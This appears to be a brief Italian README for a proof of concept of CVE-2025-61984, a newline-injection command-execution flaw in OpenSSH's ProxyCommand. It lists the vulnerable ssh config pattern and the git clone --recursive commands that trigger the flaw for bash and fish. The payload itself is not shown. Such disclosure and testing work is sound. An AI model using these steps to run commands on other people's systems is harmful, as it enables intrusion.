
Proof-of-concept che dimostra una vulnerabilità di iniezione di newline in OpenSSH ProxyCommand (CVE-2025-61984), consentendo l'iniezione di comandi tramite una configurazione SSH appositamente predisposta.
Questa è una proof of concept che utilizza un carattere di nuova riga per confondere il ProxyCommand di OpenSSH <10.1. Articolo completo.
Configura un .ssh/config contenente:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(Il comando non ha importanza, deve solo contenere un %r non quotato negli argomenti da qualche parte.)
Poi esegui (per bash):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
Oppure se usi fish come $SHELL:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
Se non stai usando la shell ma vuoi comunque testare questo, puoi fare:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc